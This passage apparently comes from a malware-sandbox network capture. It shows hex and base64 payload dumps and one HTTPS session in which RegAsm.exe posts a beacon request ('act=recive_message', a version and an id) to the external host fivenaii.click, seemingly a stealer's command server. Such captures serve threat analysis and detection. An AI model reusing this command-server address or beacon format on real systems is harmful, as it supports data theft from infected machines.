                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 77 57 7a 34 79 51 6f 78 47 73 30 74 4f 6a 41 59 6c 6b 72 6f 2f 46 78 4e 34 61 68 63 56 71 77 5a 77 35 67 32 2b 49 6d 47 71 55 33 4f 5a 50 69 47 51 33 41 64 78 32 4a 69 63 30 4f 73 54 66 50 69 52 6b 2f 2f 70 42 74 42 36 77 65 4d 6d 44 4b 2b 33 73 58 68 44 34 42 6d 34 38 6b 63 4d 54 33 46 62 6d 46 6b 52 72 55 4a 35 71 4e 51 41 50 61 69 58 42 47 69 42 6f 32 65 4e 37 6a 44 7a 71 70 4b 78 58 50 77 67 45 6c 38 48 64 68 6e 62 58 4e 4c 6f 30 50 7a 34 6b 4e 45 2f 4b 4d 61 53 65 4a 41 7a 64 38 39 6f 4a 47 65 34 57 4c 46 63 66 79 46 55 6a 4d 6e 6c 58 49 73 61 51 75 6a 52 62 6d 31 43 55 6a 30 72 52 39 43 37 51 4f 4c 6c 43 69 34 77 38 43 73 52 4e 4a 6e 2f 6f 64 4f 63 67 2f 66 59 32 52 7a 51 71 39 41 2f 4f 70 4e 41 4c 2f 75 47 31 47 69 57 4d 4f 2b 4e 37 50 64 7a 4c 5a
                                                                                              Data Ascii: wWz4yQoxGs0tOjAYlkro/FxN4ahcVqwZw5g2+ImGqU3OZPiGQ3Adx2Jic0OsTfPiRk//pBtB6weMmDK+3sXhD4Bm48kcMT3FbmFkRrUJ5qNQAPaiXBGiBo2eN7jDzqpKxXPwgEl8HdhnbXNLo0Pz4kNE/KMaSeJAzd89oJGe4WLFcfyFUjMnlXIsaQujRbm1CUj0rR9C7QOLlCi4w8CsRNJn/odOcg/fY2RzQq9A/OpNAL/uG1GiWMO+N7PdzLZ
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 5a 74 45 66 51 2f 5a 5a 32 52 2f 52 71 67 4a 74 36 31 4f 57 4c 48 32 58 47 50 68 46 49 43 56 65 49 33 53 79 4b 39 47 31 69 48 6b 78 31 30 78 47 74 6b 74 4f 6a 42 47 70 55 48 2f 2f 30 5a 4e 38 71 41 53 52 75 63 50 69 35 38 36 74 64 54 43 71 6b 72 44 62 50 2b 62 54 6e 45 56 30 47 78 6f 65 67 76 71 43 66 37 31 43 52 69 78 6e 77 74 43 6f 44 57 41 6b 54 53 2f 78 34 61 2b 44 39 6b 68 2f 49 55 45 4b 56 33 59 5a 57 64 31 52 4b 56 44 39 2b 68 44 54 50 6d 67 48 31 76 74 42 49 4f 54 4d 72 4c 63 79 4b 56 4a 79 57 72 77 6a 30 52 77 46 35 55 6a 49 6e 64 54 35 42 47 35 32 55 35 4d 2f 4b 46 65 66 4f 45 4f 6a 5a 67 73 2b 4d 36 49 75 41 48 48 62 62 76 52 42 48 30 55 31 57 5a 6f 64 45 75 6a 52 50 7a 75 54 6b 50 38 71 52 5a 48 35 51 53 50 6c 6a 65 2b 30 63 47 6c 52 4e 4a 6b
                                                                                              Data Ascii: ZtEfQ/ZZ2R/RqgJt61OWLH2XGPhFICVeI3SyK9G1iHkx10xGtktOjBGpUH//0ZN8qASRucPi586tdTCqkrDbP+bTnEV0GxoegvqCf71CRixnwtCoDWAkTS/x4a+D9kh/IUEKV3YZWd1RKVD9+hDTPmgH1vtBIOTMrLcyKVJyWrwj0RwF5UjIndT5BG52U5M/KFefOEOjZgs+M6IuAHHbbvRBH0U1WZodEujRPzuTkP8qRZH5QSPlje+0cGlRNJk
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 6f 6f 32 33 73 69 62 77 57 39 43 66 37 68 43 52 69 78 70 78 56 62 37 41 36 4b 6b 6a 79 77 31 73 69 73 53 73 5a 71 2f 49 35 43 66 42 58 59 61 47 46 78 54 36 35 62 2b 75 5a 44 54 66 76 75 55 67 6e 6c 47 4d 50 48 65 70 2f 64 37 37 46 61 30 6e 65 37 6c 67 70 6f 58 64 4a 68 49 69 67 4c 70 30 62 77 34 6b 46 49 2f 71 45 59 52 2b 51 47 6a 70 6f 31 73 73 50 4f 72 30 7a 4c 62 76 43 62 52 48 77 5a 32 57 6c 71 65 30 48 6b 42 37 6e 71 55 51 43 70 37 69 6c 45 37 51 43 41 69 58 71 6e 6e 39 2f 68 52 73 77 68 6f 38 6c 49 66 78 33 61 59 57 35 37 51 36 56 46 39 2b 70 4d 53 66 6d 6d 44 6b 6a 6d 43 49 4b 52 4e 62 6e 56 77 36 52 46 78 32 58 39 68 67 51 2f 58 64 4a 31 49 69 67 4c 69 32 37 4d 72 32 68 36 73 62 46 53 55 4b 49 48 6a 39 39 69 2b 4e 33 46 72 55 6e 50 5a 2f 4b 46 54
                                                                                              Data Ascii: oo23sibwW9Cf7hCRixpxVb7A6Kkjyw1sisSsZq/I5CfBXYaGFxT65b+uZDTfvuUgnlGMPHep/d77Fa0ne7lgpoXdJhIigLp0bw4kFI/qEYR+QGjpo1ssPOr0zLbvCbRHwZ2Wlqe0HkB7nqUQCp7ilE7QCAiXqnn9/hRswho8lIfx3aYW57Q6VF9+pMSfmmDkjmCIKRNbnVw6RFx2X9hgQ/XdJ1IigLi27Mr2h6sbFSUKIHj99i+N3FrUnPZ/KFT
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 6e 61 58 52 49 6f 45 7a 32 37 45 68 47 34 36 6b 56 57 2b 77 4e 6a 4a 63 79 73 64 44 43 70 45 7a 47 62 66 47 49 51 33 38 54 33 53 30 73 4d 45 79 38 43 61 47 74 61 46 44 71 76 41 70 45 77 77 32 4d 33 79 58 32 79 49 61 6d 54 59 41 35 75 34 42 57 64 52 44 48 5a 47 56 2b 52 4b 64 62 2b 4f 42 43 55 76 61 68 47 45 37 75 42 6f 79 5a 4f 37 33 62 79 71 5a 45 79 32 37 33 79 51 6f 78 47 73 30 74 4f 6a 42 6c 72 31 72 75 37 6b 64 4c 35 37 56 63 56 71 77 5a 77 35 67 32 2b 49 6d 47 6f 6b 72 4c 5a 66 75 46 52 48 55 51 31 58 39 74 64 30 79 74 51 75 76 6e 54 6b 66 36 70 68 64 47 35 42 4b 50 6b 53 69 39 77 39 54 68 44 34 42 6d 34 38 6b 63 4d 53 76 53 66 58 4a 7a 43 5a 56 66 2b 76 74 43 54 66 33 75 41 77 66 37 51 49 53 54 65 75 43 52 77 4b 35 49 77 32 37 36 67 45 68 38 47 4e
                                                                                              Data Ascii: naXRIoEz27EhG46kVW+wNjJcysdDCpEzGbfGIQ38T3S0sMEy8CaGtaFDqvApEww2M3yX2yIamTYA5u4BWdRDHZGV+RKdb+OBCUvahGE7uBoyZO73byqZEy273yQoxGs0tOjBlr1ru7kdL57VcVqwZw5g2+ImGokrLZfuFRHUQ1X9td0ytQuvnTkf6phdG5BKPkSi9w9ThD4Bm48kcMSvSfXJzCZVf+vtCTf3uAwf7QISTeuCRwK5Iw276gEh8GN
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 63 36 39 48 79 2b 35 53 41 4f 37 67 42 51 6e 6c 44 4d 50 48 65 72 76 57 78 61 42 4c 79 57 33 30 6a 6b 42 6a 46 39 4a 2f 59 33 46 41 71 55 58 35 34 45 52 4b 38 4b 63 52 52 65 38 48 68 4a 41 2f 2b 4a 2b 47 70 6c 6d 41 4f 62 75 6f 53 58 6f 52 6a 6a 63 69 62 77 57 39 43 66 37 68 43 52 69 78 72 68 5a 4d 36 41 32 41 6b 44 6d 71 30 4d 43 7a 51 63 31 72 36 59 4e 50 64 42 44 59 59 47 46 32 54 61 39 46 36 2b 52 4a 51 2f 72 75 55 67 6e 6c 47 4d 50 48 65 70 76 47 30 4b 74 47 7a 48 66 77 69 45 64 6e 45 4d 55 74 4c 44 42 61 6f 31 69 35 74 56 39 51 35 71 6b 44 42 2f 74 41 68 4a 4e 36 34 4a 48 41 71 45 66 48 5a 2f 57 62 51 58 63 53 32 6d 52 72 64 45 4f 6e 53 66 33 70 54 6b 58 79 6f 68 64 4f 34 51 2b 48 6c 6a 53 78 33 6f 62 76 41 63 64 35 75 39 45 45 55 41 62 57 59 57 38
                                                                                              Data Ascii: c69Hy+5SAO7gBQnlDMPHervWxaBLyW30jkBjF9J/Y3FAqUX54ERK8KcRRe8HhJA/+J+GplmAObuoSXoRjjcibwW9Cf7hCRixrhZM6A2AkDmq0MCzQc1r6YNPdBDYYGF2Ta9F6+RJQ/ruUgnlGMPHepvG0KtGzHfwiEdnEMUtLDBao1i5tV9Q5qkDB/tAhJN64JHAqEfHZ/WbQXcS2mRrdEOnSf3pTkXyohdO4Q+HljSx3obvAcd5u9EEUAbWYW8
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 76 43 74 42 77 44 32 74 6c 77 52 6f 69 43 49 69 54 2b 2f 78 34 53 55 51 73 35 76 2f 4a 38 45 62 69 4b 62 4c 57 31 71 43 2f 78 77 34 4b 31 4f 54 4c 48 32 58 46 7a 6c 41 49 53 46 4c 4c 2f 64 31 36 70 4d 7a 45 50 30 6a 6c 4a 79 45 74 5a 38 61 7a 78 41 71 51 6d 33 72 55 35 59 73 66 5a 63 5a 75 55 57 67 4c 41 35 71 64 69 47 37 77 48 48 64 37 76 52 42 45 39 64 78 32 35 79 63 30 53 31 64 37 6d 31 55 48 36 78 70 51 70 4f 38 67 4f 56 6c 44 65 30 77 50 6a 68 47 5a 51 7a 71 64 73 57 49 77 4b 56 63 6c 30 2b 43 36 55 4a 6f 64 52 51 41 4f 66 75 52 42 75 73 51 4a 48 66 59 76 69 57 78 62 4e 54 78 6d 4c 74 69 67 4e 50 49 2f 4a 37 61 48 64 62 6f 31 37 32 72 51 63 41 2f 75 35 45 63 4b 49 4a 68 49 51 72 72 74 7a 57 70 67 48 2f 4c 37 75 52 42 43 6c 64 34 47 35 73 66 6b 79 79
                                                                                              Data Ascii: vCtBwD2tlwRoiCIiT+/x4SUQs5v/J8EbiKbLW1qC/xw4K1OTLH2XFzlAISFLL/d16pMzEP0jlJyEtZ8azxAqQm3rU5YsfZcZuUWgLA5qdiG7wHHd7vRBE9dx25yc0S1d7m1UH6xpQpO8gOVlDe0wPjhGZQzqdsWIwKVcl0+C6UJodRQAOfuRBusQJHfYviWxbNTxmLtigNPI/J7aHdbo172rQcA/u5EcKIJhIQrrtzWpgH/L7uRBCld4G5sfkyy
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 70 57 38 75 6b 69 64 2b 4d 4e 6a 4e 4d 30 73 39 48 42 73 56 66 62 4c 66 4f 4b 58 6d 73 6a 36 30 5a 75 64 6b 79 2b 54 76 2f 4c 61 51 43 2f 37 68 4d 4a 75 6a 6e 44 31 33 71 48 6e 34 61 35 41 5a 67 68 7a 6f 70 4b 66 78 72 44 66 43 39 59 61 4a 35 7a 75 38 46 4f 56 62 4f 61 47 31 6e 7a 43 34 36 54 65 76 61 52 77 4f 45 5a 6b 43 2b 37 6a 56 55 78 52 59 55 2f 4f 53 55 59 38 78 6d 72 38 67 64 5a 73 62 68 63 45 62 42 4f 77 34 31 36 34 4a 47 42 6f 6c 50 53 5a 2f 69 66 52 7a 59 6a 36 30 70 73 64 30 71 79 57 65 37 69 64 33 37 6b 72 52 4a 48 35 52 61 53 33 33 54 34 33 6f 62 35 65 49 41 70 75 37 59 4b 4d 51 57 56 4e 53 4a 46 53 4b 70 48 2f 76 74 59 44 64 61 67 47 30 6a 30 45 4a 53 51 65 76 61 52 77 4f 45 5a 6b 69 2b 37 6a 56 55 78 52 59 55 2f 4f 53 55 59 38 78 6d 72 38
                                                                                              Data Ascii: pW8ukid+MNjNM0s9HBsVfbLfOKXmsj60Zudky+Tv/LaQC/7hMJujnD13qHn4a5AZghzopKfxrDfC9YaJ5zu8FOVbOaG1nzC46TevaRwOEZkC+7jVUxRYU/OSUY8xmr8gdZsbhcEbBOw4164JGBolPSZ/ifRzYj60psd0qyWe7id37krRJH5RaS33T43ob5eIApu7YKMQWVNSJFSKpH/vtYDdagG0j0EJSQevaRwOEZki+7jVUxRYU/OSUY8xmr8
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 70 58 6d 6a 6f 45 49 36 51 50 66 72 78 77 62 64 43 67 43 2b 37 68 51 51 70 58 64 52 6e 63 6e 31 45 6f 77 58 2b 39 30 34 41 76 2b 34 53 43 62 70 41 67 70 55 71 74 64 37 42 37 55 66 4f 62 37 75 57 43 6d 68 64 77 79 30 36 49 77 58 6b 57 37 6d 31 43 51 66 79 76 41 35 50 34 52 61 41 32 41 53 47 2f 4e 53 6d 55 63 4d 6a 79 6f 52 41 5a 77 6a 57 66 57 56 4f 64 59 6c 62 2f 76 31 4b 41 73 43 34 48 30 6e 73 42 38 50 52 65 71 43 52 6e 75 46 73 30 6d 62 72 69 67 51 2f 58 64 6b 74 4f 6a 42 47 74 6b 37 70 37 67 56 48 36 36 6c 63 56 71 77 5a 77 34 6c 36 34 49 4b 49 34 56 4f 41 4f 62 76 4f 53 6e 77 63 31 6d 4e 68 59 6c 6d 69 53 75 2f 75 44 6e 37 50 67 77 35 4f 38 67 50 42 72 6a 65 38 78 39 4f 69 55 63 64 66 78 61 52 57 64 67 33 57 4c 30 35 33 52 71 68 33 78 39 70 59 52 2b
                                                                                              Data Ascii: pXmjoEI6QPfrxwbdCgC+7hQQpXdRncn1EowX+904Av+4SCbpAgpUqtd7B7UfOb7uWCmhdwy06IwXkW7m1CQfyvA5P4RaA2ASG/NSmUcMjyoRAZwjWfWVOdYlb/v1KAsC4H0nsB8PReqCRnuFs0mbrigQ/XdktOjBGtk7p7gVH66lcVqwZw4l64IKI4VOAObvOSnwc1mNhYlmiSu/uDn7Pgw5O8gPBrje8x9OiUcdfxaRWdg3WL053Rqh3x9pYR+


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.449751104.21.60.244437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:15 UTC262OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 52
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:15 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=
                                                                                              2024-12-27 21:33:16 UTC1125INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:16 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=ah9cjbsb6e1l8qbt3t3h8nglg0; expires=Tue, 22 Apr 2025 15:19:55 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwjnUvTJzRQDPt2s%2BPEHcj8ULg%2FYOvQ9z6ELrz3KjcVMVZEs1xJHVkoIqff3ox3vSg68a7C7MKAH22J8O9zCE2BPsqOGU%2BlcbTQP3hssscC8dBpWCelLQG2r9U3pUgFplg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d8e79b38cba-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1989&rtt_var=770&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=950&delivery_rate=1400479&cwnd=218&unsent_bytes=0&cid=dd506907f5001ed0&ts=784&x=0"
                                                                                              2024-12-27 21:33:16 UTC244INData Raw: 32 64 31 63 0d 0a 55 41 78 61 50 6b 4f 42 66 59 30 6a 66 4d 39 71 51 33 44 55 54 6f 38 6d 51 70 35 49 65 51 38 4d 62 6d 2f 46 54 62 33 52 68 72 6b 72 4c 69 77 63 65 62 56 52 72 31 41 5a 37 56 41 33 41 71 45 72 6f 77 51 6a 2b 6d 70 44 61 57 30 43 48 4b 42 68 6e 36 66 72 6d 32 70 71 4f 31 49 77 35 46 47 76 52 67 54 74 55 42 67 4c 39 69 76 68 42 48 69 38 4c 52 4e 74 62 51 49 4e 70 43 62 53 6f 65 72 61 4f 47 41 39 56 69 62 69 47 65 78 50 45 61 6f 50 4a 68 47 2b 49 4f 5a 4c 4b 76 4e 71 56 53 31 70 46 45 33 2f 62 2f 43 30 38 74 67 64 62 53 6c 56 59 66 78 52 39 67 45 5a 6f 55 68 35 55 72 55 72 37 55 6f 6b 2b 69 4d 52 5a 32 51 4b 44 4b 45 6e 7a 62 6a 67 30 54 68 75 50 6c 63 73 36 77 33 68 52 52 61 68 43 53 77 52 39 6d 4b 74 51 7a
                                                                                              Data Ascii: 2d1cUAxaPkOBfY0jfM9qQ3DUTo8mQp5IeQ8Mbm/FTb3RhrkrLiwcebVRr1AZ7VA3AqErowQj+mpDaW0CHKBhn6frm2pqO1Iw5FGvRgTtUBgL9ivhBHi8LRNtbQINpCbSoeraOGA9VibiGexPEaoPJhG+IOZLKvNqVS1pFE3/b/C08tgdbSlVYfxR9gEZoUh5UrUr7Uok+iMRZ2QKDKEnzbjg0ThuPlcs6w3hRRahCSwR9mKtQz
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 69 38 63 6c 73 2b 58 41 38 63 74 6a 72 53 6f 2b 4b 62 4c 53 41 68 48 43 62 76 58 37 63 42 46 71 45 47 4a 42 47 35 4b 2b 78 45 4d 76 4d 71 47 47 56 6d 43 41 65 6f 49 4e 43 39 37 74 77 36 5a 7a 39 54 4a 75 73 5a 34 45 4a 65 34 30 67 6d 43 76 5a 30 72 57 51 77 2f 79 6b 50 59 48 39 4d 45 75 6b 32 6e 37 54 6f 6d 32 6f 75 50 6c 49 67 37 68 2f 39 53 52 57 6d 44 54 4d 5a 76 79 48 67 52 43 33 32 4a 52 68 74 61 51 59 48 71 43 58 62 76 75 6e 64 4d 6d 35 34 45 6d 48 6b 42 36 38 5a 58 6f 34 4e 4d 52 57 36 4f 71 39 2b 59 4f 4e 6b 41 69 31 70 41 45 33 2f 62 39 65 32 35 39 67 35 59 54 74 55 4b 76 45 66 2f 55 63 54 71 42 6f 6e 46 37 67 6d 37 6c 59 71 38 69 77 59 5a 47 55 46 43 4b 41 72 6e 2f 32 6b 33 43 6f 75 59 42 77 41 37 68 54 6a 53 77 6d 74 53 44 35 63 72 32 7a 71 53
                                                                                              Data Ascii: i8cls+XA8ctjrSo+KbLSAhHCbvX7cBFqEGJBG5K+xEMvMqGGVmCAeoINC97tw6Zz9TJusZ4EJe40gmCvZ0rWQw/ykPYH9MEuk2n7Tom2ouPlIg7h/9SRWmDTMZvyHgRC32JRhtaQYHqCXbvundMm54EmHkB68ZXo4NMRW6Oq9+YONkAi1pAE3/b9e259g5YTtUKvEf/UcTqBonF7gm7lYq8iwYZGUFCKArn/2k3CouYBwA7hTjSwmtSD5cr2zqS
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 55 59 47 4a 4d 51 2b 63 6f 78 2f 4f 38 6d 78 68 74 4c 46 38 72 6f 53 72 73 54 78 43 71 48 6d 45 4e 2b 44 57 74 51 79 79 38 63 6c 74 67 62 77 51 4c 74 53 44 53 73 4f 72 56 50 57 73 33 56 43 48 6a 45 75 70 46 46 61 59 4c 4c 42 61 6b 4a 75 31 4d 4a 66 30 67 45 53 30 67 54 41 71 2f 62 34 66 7a 31 63 77 35 4c 41 31 66 4c 2b 30 59 2b 51 45 42 34 78 46 68 46 62 70 73 74 51 51 74 39 43 38 65 59 6d 38 47 41 36 49 6c 30 37 76 71 32 43 42 68 50 46 77 74 36 78 58 69 54 78 71 6c 41 53 6f 5a 73 43 7a 73 54 6d 43 79 61 68 78 31 4c 6c 52 4e 6b 79 6a 54 76 75 75 5a 42 32 30 32 55 69 62 31 58 2f 41 50 42 2b 30 50 4c 56 4c 75 62 4f 46 4e 49 50 63 67 48 32 31 70 41 51 69 6b 4b 4e 79 2b 34 39 45 38 61 54 78 51 4b 4f 34 5a 37 30 59 61 71 42 6f 6b 47 37 6f 67 72 51 70 67 2b 7a
                                                                                              Data Ascii: UYGJMQ+cox/O8mxhtLF8roSrsTxCqHmEN+DWtQyy8cltgbwQLtSDSsOrVPWs3VCHjEupFFaYLLBakJu1MJf0gES0gTAq/b4fz1cw5LA1fL+0Y+QEB4xFhFbpstQQt9C8eYm8GA6Il07vq2CBhPFwt6xXiTxqlASoZsCzsTmCyahx1LlRNkyjTvuuZB202Uib1X/APB+0PLVLubOFNIPcgH21pAQikKNy+49E8aTxQKO4Z70YaqBokG7ogrQpg+z
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 54 41 71 72 62 34 66 7a 37 64 49 67 59 44 5a 56 4c 4f 55 58 36 45 38 54 70 67 34 71 46 62 45 71 34 45 77 74 2b 53 6b 61 61 57 51 65 44 71 77 6c 30 72 6d 6b 6c 58 4a 70 49 42 78 35 6f 7a 6a 6a 61 41 36 32 47 6a 64 53 71 57 4c 30 42 43 66 77 61 6b 4d 74 62 51 4d 45 71 43 66 58 76 4f 76 66 50 47 67 2b 55 53 54 73 46 66 31 4a 45 4b 41 44 4c 68 6d 6b 4c 4f 42 41 4c 50 67 69 45 47 63 75 51 6b 32 67 4e 35 2f 72 70 4f 34 2f 59 54 68 66 4e 36 4d 41 6f 56 68 65 71 67 52 68 53 76 59 67 34 30 51 76 38 43 59 51 5a 57 38 41 41 36 41 71 31 72 76 73 79 54 4e 71 4d 46 30 76 37 42 37 72 52 42 75 70 44 79 55 55 75 57 79 6a 42 43 66 6b 61 6b 4d 74 51 53 73 34 35 51 37 6c 38 2f 75 56 4b 79 34 2f 55 47 47 37 58 2b 4e 43 45 71 55 48 4a 78 75 36 4a 75 52 50 4c 50 63 75 46 32 52
                                                                                              Data Ascii: TAqrb4fz7dIgYDZVLOUX6E8Tpg4qFbEq4Ewt+SkaaWQeDqwl0rmklXJpIBx5ozjjaA62GjdSqWL0BCfwakMtbQMEqCfXvOvfPGg+USTsFf1JEKADLhmkLOBALPgiEGcuQk2gN5/rpO4/YThfN6MAoVheqgRhSvYg40Qv8CYQZW8AA6Aq1rvsyTNqMF0v7B7rRBupDyUUuWyjBCfkakMtQSs45Q7l8/uVKy4/UGG7X+NCEqUHJxu6JuRPLPcuF2R
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 69 37 5a 6f 65 50 53 49 47 41 31 55 79 6e 72 46 75 35 46 47 36 41 4f 4c 52 69 33 4b 2b 4e 4b 4b 4c 78 6b 57 32 70 32 54 46 58 6e 44 73 2b 6f 39 73 30 2f 54 7a 56 54 59 66 78 52 39 67 45 5a 6f 55 68 35 55 72 38 2b 36 55 6b 79 39 53 30 56 59 6d 30 65 44 4b 6f 6b 7a 62 54 72 33 7a 56 69 50 6c 4d 6e 34 68 72 6c 54 52 6d 6f 41 79 34 65 39 6d 4b 74 51 7a 69 38 63 6c 74 44 5a 52 38 61 70 43 48 55 70 66 2b 62 4c 53 41 68 48 43 62 76 58 37 63 42 48 61 59 44 4a 52 4b 36 4c 4f 6c 4a 49 4f 34 6c 48 47 70 6e 42 78 2b 74 4b 4e 69 34 37 4e 41 39 61 43 70 51 4c 2f 45 61 2f 56 4e 65 34 30 67 6d 43 76 5a 30 72 58 49 6e 37 44 6f 59 4c 31 38 61 44 72 45 6b 30 72 2b 6b 78 48 78 33 65 46 73 74 6f 30 65 76 52 78 47 6b 43 79 34 54 76 79 44 67 51 53 6e 35 4b 78 31 70 5a 41 59 4e
                                                                                              Data Ascii: i7ZoePSIGA1UynrFu5FG6AOLRi3K+NKKLxkW2p2TFXnDs+o9s0/TzVTYfxR9gEZoUh5Ur8+6Uky9S0VYm0eDKokzbTr3zViPlMn4hrlTRmoAy4e9mKtQzi8cltDZR8apCHUpf+bLSAhHCbvX7cBHaYDJRK6LOlJIO4lHGpnBx+tKNi47NA9aCpQL/Ea/VNe40gmCvZ0rXIn7DoYL18aDrEk0r+kxHx3eFsto0evRxGkCy4TvyDgQSn5Kx1pZAYN
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 79 71 77 6e 4a 70 4e 42 78 35 6f 78 7a 6f 51 68 2b 6e 41 53 30 64 73 53 6a 2f 54 69 66 75 4b 78 70 6d 59 77 41 4e 71 69 4c 56 73 75 33 57 50 6d 4d 2f 57 79 37 6d 58 36 45 42 47 62 56 49 65 56 4b 58 49 65 5a 49 65 36 5a 71 42 43 4e 33 54 41 71 72 62 34 66 7a 35 4e 45 33 5a 44 56 66 4c 75 41 4e 37 6b 63 4d 72 51 55 72 41 4c 77 6e 36 45 6b 74 38 53 6b 64 61 32 55 41 48 36 34 76 33 4c 69 6b 6c 58 4a 70 49 42 78 35 6f 7a 7a 34 56 78 53 71 42 44 63 5a 74 79 2f 37 53 54 43 38 5a 46 74 38 61 52 31 4e 2f 7a 6e 50 70 4f 50 45 66 48 64 34 57 79 32 6a 52 36 39 48 46 36 73 50 4a 78 79 6b 4b 65 74 4c 4c 2f 55 6a 48 32 56 74 44 41 6d 6a 4b 4e 71 77 36 4e 41 31 62 54 64 59 4b 4f 30 57 34 41 46 51 37 51 38 35 55 75 35 73 7a 46 38 6a 38 43 64 62 63 69 41 56 54 61 41 6a 6e
                                                                                              Data Ascii: yqwnJpNBx5oxzoQh+nAS0dsSj/TifuKxpmYwANqiLVsu3WPmM/Wy7mX6EBGbVIeVKXIeZIe6ZqBCN3TAqrb4fz5NE3ZDVfLuAN7kcMrQUrALwn6Ekt8Skda2UAH64v3LiklXJpIBx5ozz4VxSqBDcZty/7STC8ZFt8aR1N/znPpOPEfHd4Wy2jR69HF6sPJxykKetLL/UjH2VtDAmjKNqw6NA1bTdYKO0W4AFQ7Q85Uu5szF8j8CdbciAVTaAjn
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 71 4c 68 68 58 4e 2b 59 59 2b 51 4d 72 72 67 59 76 46 61 42 73 38 6e 74 75 76 43 55 42 4c 54 59 31 46 4f 63 6f 30 2f 4f 38 6d 79 64 70 4f 46 73 37 39 52 6a 6a 55 42 57 67 42 41 4d 64 73 54 72 75 53 79 50 74 49 31 64 6d 59 30 78 44 35 79 6a 48 38 37 79 62 48 57 6b 75 58 77 37 67 44 75 59 42 55 4f 30 50 4e 31 4c 75 62 4e 4d 45 4d 76 38 36 47 47 4a 2f 4d 6b 33 2f 4e 75 48 7a 37 38 30 31 66 6a 74 4b 4b 75 34 54 2f 6e 39 65 39 56 78 7a 51 4f 52 2b 76 31 74 67 34 78 56 56 4c 57 39 4d 56 5a 34 32 6e 36 57 6b 67 32 41 67 65 45 35 68 75 31 2b 6f 51 67 79 2f 44 69 49 45 74 57 76 54 65 67 66 71 49 42 78 39 61 52 73 43 35 32 47 66 76 4b 53 44 43 79 34 78 57 7a 72 79 43 65 4a 52 47 65 30 33 62 31 4b 75 62 4c 55 45 46 66 38 6b 46 57 70 34 48 55 43 41 4f 64 57 30 39 4e
                                                                                              Data Ascii: qLhhXN+YY+QMrrgYvFaBs8ntuvCUBLTY1FOco0/O8mydpOFs79RjjUBWgBAMdsTruSyPtI1dmY0xD5yjH87ybHWkuXw7gDuYBUO0PN1LubNMEMv86GGJ/Mk3/NuHz7801fjtKKu4T/n9e9VxzQOR+v1tg4xVVLW9MVZ42n6Wkg2AgeE5hu1+oQgy/DiIEtWvTegfqIBx9aRsC52GfvKSDCy4xWzryCeJRGe03b1KubLUEFf8kFWp4HUCAOdW09N
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 55 32 33 74 46 4f 39 47 44 72 73 54 62 52 71 31 4e 76 64 36 48 74 63 6d 48 57 70 30 43 77 75 42 44 35 2f 39 70 4e 52 79 4e 67 45 63 61 61 4d 67 6f 51 45 47 37 56 42 68 4a 37 55 69 34 30 4d 32 37 57 63 7a 54 6c 51 32 54 34 73 6f 79 76 48 51 33 43 4a 2f 4d 31 45 74 6f 31 47 76 52 31 37 31 57 47 39 53 73 6a 32 74 48 48 43 75 63 55 34 2b 4f 56 78 66 75 47 48 47 38 2f 4b 62 61 6a 78 32 48 44 4f 6a 52 36 38 47 48 62 38 61 4a 78 47 67 4c 36 70 36 48 74 73 6b 48 47 78 34 48 42 71 6f 45 65 47 6d 35 39 55 38 61 53 35 4e 59 61 31 66 34 41 46 47 6c 45 68 70 55 6f 6c 69 72 56 78 67 70 47 6f 75 62 6d 41 43 43 72 45 2b 6b 70 54 71 33 44 4e 34 4b 45 73 75 6f 31 47 76 52 31 37 31 57 6d 39 53 73 6a 32 74 48 48 43 75 63 55 34 2b 4f 56 78 66 75 47 48 47 38 2f 4b 62 61 6a 78
